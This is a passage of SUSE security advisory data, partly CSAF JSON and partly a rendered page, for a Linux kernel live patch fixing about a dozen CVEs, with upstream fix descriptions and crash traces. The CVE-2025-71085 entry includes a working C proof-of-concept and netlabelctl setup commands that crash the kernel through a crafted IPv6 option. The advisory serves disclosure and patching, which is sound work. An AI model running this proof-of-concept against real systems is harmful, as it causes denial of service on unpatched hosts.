"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T07:08:02Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T07:08:02Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T07:08:02Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T07:08:02Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T07:08:02Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_97-default-16-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T07:08:02Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1002-1
Vulnerability from csaf_suse - Published: 2026-03-25 09:34 - Updated: 2026-03-25 09:34Summary
Security update for the Linux Kernel (Live Patch 27 for SUSE Linux Enterprise 15 SP5)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 27 for SUSE Linux Enterprise 15 SP5)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 5.14.21-150500.55.110 fixes various security issues
The following security issues were fixed:
- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).
- CVE-2023-53257: wifi: mac80211: check S1G action frame size (bsc#1250730).
- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).
- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).
- CVE-2025-38159: wifi: rtw88: fix the 'para' buffer size to avoid reading out of bounds (bsc#1257629).
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1002,SUSE-2026-1006,SUSE-2026-1038,SUSE-SLE-Module-Live-Patching-15-SP5-2026-1006
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_110-default-14-150500.2.1.ppc64le | — |
Vendor Fix
|
|
